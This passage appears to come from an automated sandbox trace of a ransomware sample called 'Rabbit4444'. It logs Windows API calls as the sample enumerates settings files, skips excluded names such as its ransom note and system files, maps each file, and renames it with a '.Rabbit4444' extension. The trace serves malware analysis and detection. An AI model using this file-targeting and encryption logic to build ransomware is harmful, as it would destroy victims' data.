lstrcmpiW (lpString1="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.348] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms" | out: lpString1="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms") returned="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms" [0059.348] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.348] lstrlenW (lpString="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms") returned 64 [0059.348] lstrlenW (lpString="Rabbit4444") returned 10 [0059.348] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.348] lstrlenW (lpString=".dll") returned 4 [0059.348] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.348] lstrlenW (lpString=".lnk") returned 4 [0059.349] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.349] lstrlenW (lpString=".ini") returned 4 [0059.349] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.349] lstrlenW (lpString=".sys") returned 4 [0059.349] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.349] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b1207959-ffbf-4417-a6b1-4bf0eda51f5a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.349] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.349] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15065973240) returned 1 [0059.349] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=914) returned 1 [0059.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0059.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0059.349] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a0, lpName=0x0) returned 0x298 [0059.353] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a0) returned 0x70000 [0059.353] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.353] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.354] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15066468243) returned 1 [0059.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0059.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0059.354] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.354] CloseHandle (hObject=0x298) returned 1 [0059.354] CloseHandle (hObject=0x278) returned 1 [0059.354] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms.Rabbit4444") returned 192 [0059.354] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b1207959-ffbf-4417-a6b1-4bf0eda51f5a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b1207959-ffbf-4417-a6b1-4bf0eda51f5a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.355] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54f44b98, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x54f44b98, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224d97aa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms", cAlternateFileName="CL900D~1.SET")) returned 1 [0059.355] lstrcmpiW (lpString1="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.355] lstrcmpiW (lpString1="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.355] lstrcmpiW (lpString1="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.355] lstrcmpiW (lpString1="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms", lpString2=".") returned 1 [0059.355] lstrcmpiW (lpString1="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms", lpString2="..") returned 1 [0059.356] lstrcmpiW (lpString1="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms", lpString2="windows") returned -1 [0059.356] lstrcmpiW (lpString1="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.356] lstrcmpiW (lpString1="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.356] lstrcmpiW (lpString1="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms", lpString2="boot") returned 1 [0059.356] lstrcmpiW (lpString1="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.356] lstrcmpiW (lpString1="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.356] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms" | out: lpString1="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms") returned="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms" [0059.356] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.356] lstrlenW (lpString="Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms") returned 64 [0059.356] lstrlenW (lpString="Rabbit4444") returned 10 [0059.356] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.356] lstrlenW (lpString=".dll") returned 4 [0059.356] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.356] lstrlenW (lpString=".lnk") returned 4 [0059.356] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.356] lstrlenW (lpString=".ini") returned 4 [0059.356] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.356] lstrlenW (lpString=".sys") returned 4 [0059.356] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.356] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b123b0ab-2e4e-4325-804a-32f99784da0b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.357] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.357] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15066748991) returned 1 [0059.357] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=999) returned 1 [0059.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0059.357] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x298 [0059.358] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x70000 [0059.359] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.359] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.359] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.359] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.359] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15067010806) returned 1 [0059.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0059.359] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.360] CloseHandle (hObject=0x298) returned 1 [0059.360] CloseHandle (hObject=0x278) returned 1 [0059.360] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms.Rabbit4444") returned 192 [0059.360] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b123b0ab-2e4e-4325-804a-32f99784da0b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b123b0ab-2e4e-4325-804a-32f99784da0b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.361] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54fdd53c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x54fdd53c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2241abe6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms", cAlternateFileName="CL572A~1.SET")) returned 1 [0059.361] lstrcmpiW (lpString1="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.361] lstrcmpiW (lpString1="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.361] lstrcmpiW (lpString1="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.361] lstrcmpiW (lpString1="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms", lpString2=".") returned 1 [0059.361] lstrcmpiW (lpString1="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms", lpString2="..") returned 1 [0059.361] lstrcmpiW (lpString1="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms", lpString2="windows") returned -1 [0059.361] lstrcmpiW (lpString1="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.361] lstrcmpiW (lpString1="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.361] lstrcmpiW (lpString1="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms", lpString2="boot") returned 1 [0059.361] lstrcmpiW (lpString1="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.361] lstrcmpiW (lpString1="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.361] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms" | out: lpString1="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms") returned="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms" [0059.361] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.361] lstrlenW (lpString="Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms") returned 64 [0059.362] lstrlenW (lpString="Rabbit4444") returned 10 [0059.362] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.362] lstrlenW (lpString=".dll") returned 4 [0059.362] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.362] lstrlenW (lpString=".lnk") returned 4 [0059.362] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.362] lstrlenW (lpString=".ini") returned 4 [0059.362] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.362] lstrlenW (lpString=".sys") returned 4 [0059.362] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.362] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b1fe5142-dedd-409b-bcc8-547ec08de84e}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.362] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.362] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15067289949) returned 1 [0059.362] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=937) returned 1 [0059.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0059.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0059.362] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0059.363] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0059.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0059.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.365] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0059.365] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.365] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.365] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15067550261) returned 1 [0059.365] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0059.365] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0059.365] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.365] CloseHandle (hObject=0x298) returned 1 [0059.365] CloseHandle (hObject=0x278) returned 1 [0059.365] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms.Rabbit4444") returned 192 [0059.365] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b1fe5142-dedd-409b-bcc8-547ec08de84e}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b1fe5142-dedd-409b-bcc8-547ec08de84e}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.366] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55134a43, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x55134a43, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x345, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms", cAlternateFileName="CL1CAC~1.SET")) returned 1 [0059.366] lstrcmpiW (lpString1="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.366] lstrcmpiW (lpString1="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.366] lstrcmpiW (lpString1="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.366] lstrcmpiW (lpString1="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms", lpString2=".") returned 1 [0059.366] lstrcmpiW (lpString1="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms", lpString2="..") returned 1 [0059.366] lstrcmpiW (lpString1="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms", lpString2="windows") returned -1 [0059.366] lstrcmpiW (lpString1="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.366] lstrcmpiW (lpString1="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.366] lstrcmpiW (lpString1="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms", lpString2="boot") returned 1 [0059.366] lstrcmpiW (lpString1="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.366] lstrcmpiW (lpString1="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.366] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms" | out: lpString1="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms") returned="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms" [0059.366] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.366] lstrlenW (lpString="Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms") returned 64 [0059.367] lstrlenW (lpString="Rabbit4444") returned 10 [0059.367] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.367] lstrlenW (lpString=".dll") returned 4 [0059.367] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.367] lstrlenW (lpString=".lnk") returned 4 [0059.367] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.367] lstrlenW (lpString=".ini") returned 4 [0059.367] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.367] lstrlenW (lpString=".sys") returned 4 [0059.367] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.367] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.367] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.367] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15067789448) returned 1 [0059.367] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=837) returned 1 [0059.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0059.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0059.367] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x650, lpName=0x0) returned 0x298 [0059.371] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x650) returned 0x70000 [0059.372] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.372] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.372] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.372] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.372] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.372] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 